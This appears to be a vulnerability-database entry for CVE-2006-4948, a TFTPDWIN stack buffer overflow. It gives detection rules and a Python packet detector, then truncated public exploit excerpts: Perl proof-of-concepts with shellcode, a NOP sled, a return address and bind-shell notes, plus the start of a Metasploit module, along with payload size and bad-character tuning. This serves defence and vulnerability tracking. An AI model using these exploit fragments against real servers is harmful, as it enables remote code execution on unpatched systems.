CVE-2006-4948
Published 2006-09-23
Priority P3 (55) · Severity: high · CVSS 2.0 base score 7.5 · vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: publicly available
EPSS: 54.09% (98.9th percentile)
Stack-based buffer overflow in tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a long file name. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prosysinfo | tftp_server_tftpdwin | <= 0.4.2 | — |
| prosysinfo | tftp_server_tftpdwin | — | — |
Detection & IOCs (extracted from sources)
- IOC (bytes): `\x00\x02 + payload + ret + netascii\x00` (layout of the TFTP WRQ packet used by the exploit)
- IOC (bytes): `\x00\x01` (TFTP RRQ opcode prefix in exploit packet)
Detection:
- Detect oversized UDP packets destined for port 69 (TFTP) — the exploit sends a long filename/payload that overflows the stack in tftpd.exe via a recv_from call.
- Alert on TFTP WRQ packets (opcode \x00\x02) to port 69/udp where the filename field is abnormally long (>284 bytes) and is followed by the mode string 'netascii'.
- Alert on TFTP RRQ packets (opcode \x00\x01) to port 69/udp containing NOP sleds (\x90 sequences) followed by shellcode — indicative of the Perl PoC exploit.
- Monitor for unexpected TCP connections on port 4444 involving the host running tftpd.exe (the PoC's shellcode binds a shell on that port), which would indicate successful exploitation.
- The exploit payload space is 284 bytes with bad chars \x00; TFTP packets to port 69 with payload regions exceeding this size and lacking null bytes in the filename field are suspicious.
Caveats:
- The Metasploit module targets only TFTPDWIN version 0.4.2; the return address (ROP gadget) is hardcoded to a specific offset within tftpd.exe and will not work against other versions.
- The Metasploit module was tested on w2ksp0, w2ksp4, xpsp0, xpsp2 (English); reliability on other OS versions or locales is not guaranteed.
- The exploit requires a StackAdjustment of -3500 bytes, meaning the payload must account for significant stack displacement; standard shellcode without this adjustment will fail.
- The universal PoC (exploit 7452) restricts shellcode to avoid bytes 0x00, 0x6e, 0x65, 0x74 — any detection or payload generation must account for these bad characters.
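Detection logic for the indicators listed above, as an added example written for this page (it is not code from any of the listed exploits or from the Metasploit project): it parses a TFTP RRQ/WRQ datagram as RFC 1350 lays it out (opcode, filename, NUL, mode, NUL), flags a filename region longer than the 284-byte payload space quoted above, a run of 0x90 bytes, and a transfer mode outside RFC 1350, then runs the checks over constructed sample datagrams. The eight-byte NOP-run threshold, the `assess_tftp_request`/`scan_samples` names and the sample packets are assumptions of this example, not values from the page.

```python
import struct

TFTP_PORT = 69
OPCODE_RRQ = 1          # \x00\x01
OPCODE_WRQ = 2          # \x00\x02
RFC1350_MODES = (b"netascii", b"octet", b"mail")

# Threshold taken from the detection notes above: the exploit's payload space
# in the filename field is 284 bytes, so anything longer is suspicious.
MAX_SANE_FILENAME = 284
# Assumption of this example: eight or more consecutive 0x90 bytes count as a NOP sled.
NOP_SLED_MIN = 8


def parse_tftp_request(datagram: bytes):
    """Parse a TFTP read/write request (RFC 1350: opcode | filename | 0 | mode | 0).

    Returns a dict with opcode, filename and mode, or None when the datagram is
    not an RRQ/WRQ. The exploit packet quoted above has no NUL between the
    overflow region and 'netascii', so for that shape everything up to the
    trailing NUL becomes the filename and the mode comes back empty.
    """
    if len(datagram) < 4:
        return None
    opcode = struct.unpack("!H", datagram[:2])[0]
    if opcode not in (OPCODE_RRQ, OPCODE_WRQ):
        return None
    body = datagram[2:]
    nul = body.find(b"\x00")
    if nul == -1:
        # No terminator at all: treat the whole remainder as the filename.
        return {"opcode": opcode, "filename": body, "mode": b""}
    filename = body[:nul]
    rest = body[nul + 1:]
    nul2 = rest.find(b"\x00")
    mode = rest if nul2 == -1 else rest[:nul2]
    return {"opcode": opcode, "filename": filename, "mode": mode}


def assess_tftp_request(datagram: bytes, dst_port: int = TFTP_PORT):
    """Return the list of alert strings for one UDP payload sent to dst_port."""
    if dst_port != TFTP_PORT:
        return []
    req = parse_tftp_request(datagram)
    if req is None:
        return []
    kind = "RRQ" if req["opcode"] == OPCODE_RRQ else "WRQ"
    alerts = []
    if len(req["filename"]) > MAX_SANE_FILENAME:
        alerts.append(f"{kind}: filename region is {len(req['filename'])} bytes (> {MAX_SANE_FILENAME})")
    if b"\x90" * NOP_SLED_MIN in req["filename"]:
        alerts.append(f"{kind}: NOP sled (>= {NOP_SLED_MIN} x 0x90) in filename field")
    if req["mode"].lower() not in RFC1350_MODES:
        alerts.append(f"{kind}: non-RFC1350 transfer mode {req['mode'][:16]!r}")
    return alerts


# Constructed sample datagrams for this example (not captured traffic).
SAMPLES = {
    "benign_rrq": b"\x00\x01boot.cfg\x00octet\x00",
    # Shape of the WRQ packet quoted above: 300 filler bytes standing in for the
    # payload, 4 bytes standing in for the return address, then 'netascii'.
    "oversized_wrq": b"\x00\x02" + b"A" * 300 + b"BBBB" + b"netascii\x00",
    "nop_rrq": b"\x00\x01" + b"\x90" * 16 + b"C" * 40 + b"\x00octet\x00",
    "data_block": b"\x00\x03\x00\x01hello",   # DATA packet, not a request
}


def scan_samples(samples=SAMPLES):
    """Run the checks over every sample; returns {name: [alerts]}."""
    return {name: assess_tftp_request(pkt) for name, pkt in samples.items()}


if __name__ == "__main__":
    for name, alerts in scan_samples().items():
        print(f"{name}: {'ALERT ' + '; '.join(alerts) if alerts else 'ok'}")
```

Because the quoted exploit packet runs the overflow region straight into 'netascii', the parser sees one 312-byte filename and an empty mode, so the oversized-filename and mode checks both fire on that shape; a well-formed request to a legitimate client path produces no alert. The port check is there so the same function can be fed every UDP payload from a capture without special-casing.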
GHSA-hx28-643q-3cjf (ghsa_unreviewed, 2022-05-01): CVE-2006-4948 [HIGH] Stack-based buffer overflow in tftpd
GHSA-m958-mf4w-j778 (ghsa_unreviewed, 2022-05-01, CVSS 7.5): CVE-2007-1404 [HIGH] tftpd
tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a recv_from call. NOTE: this issue might be related to CVE-2006-4948.
No detection rules found.
Exploit-DB (2010-04-30): ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit), CVE-2006-4948
```ruby
##
# $Id: tftpdwin_long_filename.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# NOTE: the text between "Metasploit3" and the module name was lost when this
# page was extracted; the class header and the opening of initialize below are
# the standard Metasploit 3 module skeleton, restored here, not text from the page.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',
      'Description'    => %q{
          This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending
        an overly long file name to the tftpd.exe server, the stack can be overwritten.
      },
      'Author'         => [ 'patrick' ],
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2006-4948' ],
          [ 'O
```
Exploit-DB (2008-12-14): ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow, CVE-2006-4948
```perl
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!

use IO::Socket;
use warnings;
use strict;

if(!($ARGV[0]))
{
    print "[x] ProSysInfo TFTP server TFTPDWIN \n\n";
    exit(0);
}

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\x
```
Exploit-DB (2007-01-15): ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1), CVE-2006-4948
```perl
#!/usr/bin/perl -w
use IO::Socket;

if(!($ARGV[1]))
{
    print "Usage: tftpdwin-0-4-2.pl \n\n";
    exit;
}

$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
    or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";

my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
```
Metasploit: TFTPDWIN v0.4.2 Long Filename Buffer Overflow
This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/21854
- http://www.osvdb.org/29032
- http://www.securityfocus.com/bid/20131
- http://www.vupen.com/english/advisories/2006/3731
- https://exchange.xforce.ibmcloud.com/vulnerabilities/29075